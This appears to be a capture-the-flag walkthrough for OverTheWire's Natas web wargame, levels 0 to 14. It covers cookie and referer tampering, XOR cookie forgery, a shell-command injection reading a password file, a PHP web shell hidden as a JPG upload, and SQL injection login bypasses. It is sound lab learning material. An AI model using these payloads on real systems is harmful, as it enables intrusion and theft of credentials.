Natas 0 - 14
Natas is a web based wargame at over the wire (OTW). Have tried to use both python and burp method wherever applicable while solving the levels .
Each level of natas consists of its own website located at http://natasX.natas.labs.overthewire.org, where X is the level number. There is no SSH login. To access a level, enter the username for that level (e.g. natas0 for level 0) and its password.
Each level has access to the password of the next level. Your job is to somehow obtain that next password and level up. All passwords are also stored in
/etc/natas_webpass/. E.g. the password for natas5 is stored in the file
/etc/natas_webpass/natas5and only readable by natas4 and natas5.
Checked the source of the page by doing right click, got the password for next level
Upon some minor enumerating we get a folder called files on the server
Go to the files dir
got the next password in users.txt
Robots.txt has this entry
Dir is disallowed from google scraper so there must be something interesting in it
Ha got users.txt in it
Can only view this page when the referer is natas5’s host
Capture the traffic by burp proxy
Change the value in referer and forward to the browser
Same thing can be done using requests library for python
Create a session with requests library and change the refer there
The screen says not logged in even after giving password
On capturing the packet in burp suite we see a cookie with loggedin=0
Set the value to 1 and forward the request to browser got the pass for 6
Similarly we can use requests library for python and change the cookie
Inspected the page code , the script checking the password was importing a page secret.inf
Checked the page got the secret
For doing this with python I will have to create a session in my script then pass the post request with the secret .
To test this theory I can first initiate connection through the script then do a post request
here I am just creating a session and printing what I am getting on my screen. So on the response I get the html page that has the submit query button in it.
it will also print headers
Now I will add a post request to my script which will send the secret thus triggering this query .
This sends the secret with correct headers , post request to the url . We get the password
The index page routed request based on query param passed to it . About page gave about , home page gave home in query param, we replace the query param to
get the pass
Same request using python
Passed the parameters through the amazing python requests library.
Found an encoded string in the application logic for authentication
I know the encoded string so if I do reverse of it I should get the secret and when I pass the secret in the post call I should get the password
- hex 2 bin first
- String reverse
- Base 64 decode
The code takes a keyword from ui and does a grep on a dictionary file on the system directly through the passthru function
We can pass other commands after ; as its shell
dmeg; cat /etc/natas_webpass/natas10
the function in this level checks for any bad characters
We can use grep to exploit
Grep takes more than one file as input
So in the $file variable we pass a letter and the file path for password
The cookies are base64 encoded , we have to decode them first
Use the value and cipertext to get the xor key
Use the xor key to encrypt a data with show password set to yes
Send that as cookies
Base64 decoded value -
%3d is basically = in url encoding language because somebody decided for it to be so
details about xor plaintext attack https://alamot.github.io/xor_kpa/
We should not forget that:
*plaintext ⊕ key = encrypted_text
*encrypted_text ⊕ plaintext = key
*encrypted_text ⊕ key = plaintext
This basically means if I encrypt the cipher text with the key being plain text we get the xor encryption key
Xor key qw8Jqw8Jqw8Jqw8Jqw8Jqw8Jqw8Jqw8Jqw8Jqw8Jq
Use this key to get new cookie
Cookie encrypted in xor with the key ClVLIh4ASCsCBE8lAxMacFMOXTlTWxooFhRXJh4FGnBTVF4sFxFeLFMK
got the password
There is an image upload option so created one php file with the jpg extenstion that basically cats the password file
echo "<?php echo system(\"cat /etc/natas_webpass/natas13\"); ?>" > natas12.jpg
Uploaded the jpg file to the server
Changed the randomly generated filename in the request packet from .jpg to .php using burp suite
File was created with .php extension
Opened the file path on browser
Got the password
The only change in this level from previous level is there is now a check and only jpg files can be uploaded
We need to show our php file with jpeg extension to be a legit jpeg file
How we do that ?
How does the server verify a file type?
In this case, we need to know how files’ types are recognized, after some research you’ll stumble upon something called file signatures/magicnumbers.. A JPG file contains the following HEX signature: FF D8 FF DB.
ctrl+A for adding null bytes
Add 4 null bytes to add hex signature for jpg
We will use python to add the signature bytes
Another way of doing this is create a new file
Concatenate the signature hex string to
<? passthru($_GET["cmd"]); ?> which is also a way to get shell in php
We are going to use this command to get the password for level14
<?php echo system(\"cat /etc/natas_webpass/natas14\”); ?>
File is recognised as image file and contains our payload
Sending this file now
After that the payload was created properly and the php file was uploaded
All I had to do was pass ?cmd=“mycommand” to allow passthru in my payload to run it on the underlying machine
Since the code Is not sanitising the input taken from the post request sent by the user and directly using it in the query . We can send bad inputs to comment the password check so we can bypass that.
Sqlinjection attack vector basically does is, it either sends a parameter to comment out portion of the sql query or use conditions that will always be true.
All these combinations will work.
- The ( “ ) tells the sql engine that the query ends here(in this injection , after we have given the username) and (#) tells it after this its comment.
- The (“) command in the first place tells the sql engine that the user is already over and then gives it a statement that will always be true which is here (1=1) followed by # telling the engine to comment out the rest. The example 1 was in case when we knew what the username was and 2 in the case we dint know user or password
- 3rd is supposing we are sure about user which is natas15 and for the password it is using (“) first to close the colon followed by an or to a statement that will always be right because this will send the value of password filed as blank and it will as is not pass.